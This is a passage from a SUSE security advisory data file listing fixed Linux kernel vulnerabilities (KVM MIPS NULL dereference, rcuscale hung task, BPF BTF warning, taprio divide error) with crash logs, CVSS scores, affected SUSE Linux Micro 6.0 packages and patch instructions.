"references": [
{
"category": "external",
"summary": "CVE-2023-54240",
"url": "https://www.suse.com/security/cve/CVE-2023-54240"
},
{
"category": "external",
"summary": "SUSE Bug 1255918 for CVE-2023-54240",
"url": "https://bugzilla.suse.com/1255918"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54240"
},
{
"cve": "CVE-2023-54241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nMIPS: KVM: Fix NULL pointer dereference\n\nAfter commit 45c7e8af4a5e3f0bea4ac209 (\"MIPS: Remove KVM_TE support\") we\nget a NULL pointer dereference when creating a KVM guest:\n\n[ 146.243409] Starting KVM with MIPS VZ extensions\n[ 149.849151] CPU 3 Unable to handle kernel paging request at virtual address 0000000000000300, epc == ffffffffc06356ec, ra == ffffffffc063568c\n[ 149.849177] Oops[#1]:\n[ 149.849182] CPU: 3 PID: 2265 Comm: qemu-system-mip Not tainted 6.4.0-rc3+ #1671\n[ 149.849188] Hardware name: THTF CX TL630 Series/THTF-LS3A4000-7A1000-ML4A, BIOS KL4.1F.TF.D.166.201225.R 12/25/2020\n[ 149.849192] $ 0 : 0000000000000000 000000007400cce0 0000000000400004 ffffffff8119c740\n[ 149.849209] $ 4 : 000000007400cce1 000000007400cce1 0000000000000000 0000000000000000\n[ 149.849221] $ 8 : 000000240058bb36 ffffffff81421ac0 0000000000000000 0000000000400dc0\n[ 149.849233] $12 : 9800000102a07cc8 ffffffff80e40e38 0000000000000001 0000000000400dc0\n[ 149.849245] $16 : 0000000000000000 9800000106cd0000 9800000106cd0000 9800000100cce000\n[ 149.849257] $20 : ffffffffc0632b28 ffffffffc05b31b0 9800000100ccca00 0000000000400000\n[ 149.849269] $24 : 9800000106cd09ce ffffffff802f69d0\n[ 149.849281] $28 : 9800000102a04000 9800000102a07cd0 98000001106a8000 ffffffffc063568c\n[ 149.849293] Hi : 00000335b2111e66\n[ 149.849295] Lo : 6668d90061ae0ae9\n[ 149.849298] epc : ffffffffc06356ec kvm_vz_vcpu_setup+0xc4/0x328 [kvm]\n[ 149.849324] ra : ffffffffc063568c kvm_vz_vcpu_setup+0x64/0x328 [kvm]\n[ 149.849336] Status: 7400cce3 KX SX UX KERNEL EXL IE\n[ 149.849351] Cause : 1000000c (ExcCode 03)\n[ 149.849354] BadVA : 0000000000000300\n[ 149.849357] PrId : 0014c004 (ICT Loongson-3)\n[ 149.849360] Modules linked in: kvm nfnetlink_queue nfnetlink_log nfnetlink fuse sha256_generic libsha256 cfg80211 rfkill binfmt_misc vfat fat snd_hda_codec_hdmi input_leds led_class snd_hda_intel snd_intel_dspcfg snd_hda_codec snd_hda_core snd_pcm snd_timer snd serio_raw xhci_pci radeon drm_suballoc_helper drm_display_helper xhci_hcd ip_tables x_tables\n[ 149.849432] Process qemu-system-mip (pid: 2265, threadinfo=00000000ae2982d2, task=0000000038e09ad4, tls=000000ffeba16030)\n[ 149.849439] Stack : 9800000000000003 9800000100ccca00 9800000100ccc000 ffffffffc062cef4\n[ 149.849453] 9800000102a07d18 c89b63a7ab338e00 0000000000000000 ffffffff811a0000\n[ 149.849465] 0000000000000000 9800000106cd0000 ffffffff80e59938 98000001106a8920\n[ 149.849476] ffffffff80e57f30 ffffffffc062854c ffffffff811a0000 9800000102bf4240\n[ 149.849488] ffffffffc05b0000 ffffffff80e3a798 000000ff78000000 000000ff78000010\n[ 149.849500] 0000000000000255 98000001021f7de0 98000001023f0078 ffffffff81434000\n[ 149.849511] 0000000000000000 0000000000000000 9800000102ae0000 980000025e92ae28\n[ 149.849523] 0000000000000000 c89b63a7ab338e00 0000000000000001 ffffffff8119dce0\n[ 149.849535] 000000ff78000010 ffffffff804f3d3c 9800000102a07eb0 0000000000000255\n[ 149.849546] 0000000000000000 ffffffff8049460c 000000ff78000010 0000000000000255\n[ 149.849558] ...\n[ 149.849565] Call Trace:\n[ 149.849567] [\u003cffffffffc06356ec\u003e] kvm_vz_vcpu_setup+0xc4/0x328 [kvm]\n[ 149.849586] [\u003cffffffffc062cef4\u003e] kvm_arch_vcpu_create+0x184/0x228 [kvm]\n[ 149.849605] [\u003cffffffffc062854c\u003e] kvm_vm_ioctl+0x64c/0xf28 [kvm]\n[ 149.849623] [\u003cffffffff805209c0\u003e] sys_ioctl+0xc8/0x118\n[ 149.849631] [\u003cffffffff80219eb0\u003e] syscall_common+0x34/0x58\n\nThe root cause is the deletion of kvm_mips_commpage_init() leaves vcpu\n-\u003earch.cop0 NULL. So fix it by making cop0 from a pointer to an embedded\nobject.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54241",
"url": "https://www.suse.com/security/cve/CVE-2023-54241"
},
{
"category": "external",
"summary": "SUSE Bug 1255838 for CVE-2023-54241",
"url": "https://bugzilla.suse.com/1255838"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54241"
},
{
"cve": "CVE-2023-54246",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54246"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcuscale: Move rcu_scale_writer() schedule_timeout_uninterruptible() to _idle()\n\nThe rcuscale.holdoff module parameter can be used to delay the start\nof rcu_scale_writer() kthread. However, the hung-task timeout will\ntrigger when the timeout specified by rcuscale.holdoff is greater than\nhung_task_timeout_secs:\n\nrunqemu kvm nographic slirp qemuparams=\"-smp 4 -m 2048M\"\nbootparams=\"rcuscale.shutdown=0 rcuscale.holdoff=300\"\n\n[ 247.071753] INFO: task rcu_scale_write:59 blocked for more than 122 seconds.\n[ 247.072529] Not tainted 6.4.0-rc1-00134-gb9ed6de8d4ff #7\n[ 247.073400] \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 247.074331] task:rcu_scale_write state:D stack:30144 pid:59 ppid:2 flags:0x00004000\n[ 247.075346] Call Trace:\n[ 247.075660] \u003cTASK\u003e\n[ 247.075965] __schedule+0x635/0x1280\n[ 247.076448] ? __pfx___schedule+0x10/0x10\n[ 247.076967] ? schedule_timeout+0x2dc/0x4d0\n[ 247.077471] ? __pfx_lock_release+0x10/0x10\n[ 247.078018] ? enqueue_timer+0xe2/0x220\n[ 247.078522] schedule+0x84/0x120\n[ 247.078957] schedule_timeout+0x2e1/0x4d0\n[ 247.079447] ? __pfx_schedule_timeout+0x10/0x10\n[ 247.080032] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.080591] ? __pfx_process_timeout+0x10/0x10\n[ 247.081163] ? __pfx_sched_set_fifo_low+0x10/0x10\n[ 247.081760] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.082287] rcu_scale_writer+0x6b1/0x7f0\n[ 247.082773] ? mark_held_locks+0x29/0xa0\n[ 247.083252] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.083865] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.084412] kthread+0x179/0x1c0\n[ 247.084759] ? __pfx_kthread+0x10/0x10\n[ 247.085098] ret_from_fork+0x2c/0x50\n[ 247.085433] \u003c/TASK\u003e\n\nThis commit therefore replaces schedule_timeout_uninterruptible() with\nschedule_timeout_idle().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54246",
"url": "https://www.suse.com/security/cve/CVE-2023-54246"
},
{
"category": "external",
"summary": "SUSE Bug 1255915 for CVE-2023-54246",
"url": "https://bugzilla.suse.com/1255915"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54246"
},
{
"cve": "CVE-2023-54247",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54247"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Silence a warning in btf_type_id_size()\n\nsyzbot reported a warning in [1] with the following stacktrace:\n WARNING: CPU: 0 PID: 5005 at kernel/bpf/btf.c:1988 btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988\n ...\n RIP: 0010:btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988\n ...\n Call Trace:\n \u003cTASK\u003e\n map_check_btf kernel/bpf/syscall.c:1024 [inline]\n map_create+0x1157/0x1860 kernel/bpf/syscall.c:1198\n __sys_bpf+0x127f/0x5420 kernel/bpf/syscall.c:5040\n __do_sys_bpf kernel/bpf/syscall.c:5162 [inline]\n __se_sys_bpf kernel/bpf/syscall.c:5160 [inline]\n __x64_sys_bpf+0x79/0xc0 kernel/bpf/syscall.c:5160\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nWith the following btf\n [1] DECL_TAG \u0027a\u0027 type_id=4 component_idx=-1\n [2] PTR \u0027(anon)\u0027 type_id=0\n [3] TYPE_TAG \u0027a\u0027 type_id=2\n [4] VAR \u0027a\u0027 type_id=3, linkage=static\nand when the bpf_attr.btf_key_type_id = 1 (DECL_TAG),\nthe following WARN_ON_ONCE in btf_type_id_size() is triggered:\n if (WARN_ON_ONCE(!btf_type_is_modifier(size_type) \u0026\u0026\n !btf_type_is_var(size_type)))\n return NULL;\n\nNote that \u0027return NULL\u0027 is the correct behavior as we don\u0027t want\na DECL_TAG type to be used as a btf_{key,value}_type_id even\nfor the case like \u0027DECL_TAG -\u003e STRUCT\u0027. So there\nis no correctness issue here, we just want to silence warning.\n\nTo silence the warning, I added DECL_TAG as one of kinds in\nbtf_type_nosize() which will cause btf_type_id_size() returning\nNULL earlier without the warning.\n\n [1] https://lore.kernel.org/bpf/000000000000e0df8d05fc75ba86@google.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54247",
"url": "https://www.suse.com/security/cve/CVE-2023-54247"
},
{
"category": "external",
"summary": "SUSE Bug 1255892 for CVE-2023-54247",
"url": "https://bugzilla.suse.com/1255892"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54247"
},
{
"cve": "CVE-2023-54251",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54251"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: taprio: Limit TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME to INT_MAX.\n\nsyzkaller found zero division error [0] in div_s64_rem() called from\nget_cycle_time_elapsed(), where sched-\u003ecycle_time is the divisor.\n\nWe have tests in parse_taprio_schedule() so that cycle_time will never\nbe 0, and actually cycle_time is not 0 in get_cycle_time_elapsed().\n\nThe problem is that the types of divisor are different; cycle_time is\ns64, but the argument of div_s64_rem() is s32.\n\nsyzkaller fed this input and 0x100000000 is cast to s32 to be 0.\n\n @TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME={0xc, 0x8, 0x100000000}\n\nWe use s64 for cycle_time to cast it to ktime_t, so let\u0027s keep it and\nset max for cycle_time.\n\nWhile at it, we prevent overflow in setup_txtime() and add another\ntest in parse_taprio_schedule() to check if cycle_time overflows.\n\nAlso, we add a new tdc test case for this issue.\n\n[0]:\ndivide error: 0000 [#1] PREEMPT SMP KASAN NOPTI\nCPU: 1 PID: 103 Comm: kworker/1:3 Not tainted 6.5.0-rc1-00330-g60cc1f7d0605 #3\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nWorkqueue: ipv6_addrconf addrconf_dad_work\nRIP: 0010:div_s64_rem include/linux/math64.h:42 [inline]\nRIP: 0010:get_cycle_time_elapsed net/sched/sch_taprio.c:223 [inline]\nRIP: 0010:find_entry_to_transmit+0x252/0x7e0 net/sched/sch_taprio.c:344\nCode: 3c 02 00 0f 85 5e 05 00 00 48 8b 4c 24 08 4d 8b bd 40 01 00 00 48 8b 7c 24 48 48 89 c8 4c 29 f8 48 63 f7 48 99 48 89 74 24 70 \u003c48\u003e f7 fe 48 29 d1 48 8d 04 0f 49 89 cc 48 89 44 24 20 49 8d 85 10\nRSP: 0018:ffffc90000acf260 EFLAGS: 00010206\nRAX: 177450e0347560cf RBX: 0000000000000000 RCX: 177450e0347560cf\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000100000000\nRBP: 0000000000000056 R08: 0000000000000000 R09: ffffed10020a0934\nR10: ffff8880105049a7 R11: ffff88806cf3a520 R12: ffff888010504800\nR13: ffff88800c00d800 R14: ffff8880105049a0 R15: 0000000000000000\nFS: 0000000000000000(0000) GS:ffff88806cf00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f0edf84f0e8 CR3: 000000000d73c002 CR4: 0000000000770ee0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n get_packet_txtime net/sched/sch_taprio.c:508 [inline]\n taprio_enqueue_one+0x900/0xff0 net/sched/sch_taprio.c:577\n taprio_enqueue+0x378/0xae0 net/sched/sch_taprio.c:658\n dev_qdisc_enqueue+0x46/0x170 net/core/dev.c:3732\n __dev_xmit_skb net/core/dev.c:3821 [inline]\n __dev_queue_xmit+0x1b2f/0x3000 net/core/dev.c:4169\n dev_queue_xmit include/linux/netdevice.h:3088 [inline]\n neigh_resolve_output net/core/neighbour.c:1552 [inline]\n neigh_resolve_output+0x4a7/0x780 net/core/neighbour.c:1532\n neigh_output include/net/neighbour.h:544 [inline]\n ip6_finish_output2+0x924/0x17d0 net/ipv6/ip6_output.c:135\n __ip6_finish_output+0x620/0xaa0 net/ipv6/ip6_output.c:196\n ip6_finish_output net/ipv6/ip6_output.c:207 [inline]\n NF_HOOK_COND include/linux/netfilter.h:292 [inline]\n ip6_output+0x206/0x410 net/ipv6/ip6_output.c:228\n dst_output include/net/dst.h:458 [inline]\n NF_HOOK.constprop.0+0xea/0x260 include/linux/netfilter.h:303\n ndisc_send_skb+0x872/0xe80 net/ipv6/ndisc.c:508\n ndisc_send_ns+0xb5/0x130 net/ipv6/ndisc.c:666\n addrconf_dad_work+0xc14/0x13f0 net/ipv6/addrconf.c:4175\n process_one_work+0x92c/0x13a0 kernel/workqueue.c:2597\n worker_thread+0x60f/0x1240 kernel/workqueue.c:2748\n kthread+0x2fe/0x3f0 kernel/kthread.c:389\n ret_from_fork+0x2c/0x50 arch/x86/entry/entry_64.S:308\n \u003c/TASK\u003e\nModules linked in:",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54251",
"url": "https://www.suse.com/security/cve/CVE-2023-54251"
},
{
"category": "external",
"summary": "SUSE Bug 1255888 for CVE-2023-54251",
"url": "https://bugzilla.suse.com/1255888"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54251"
},
{
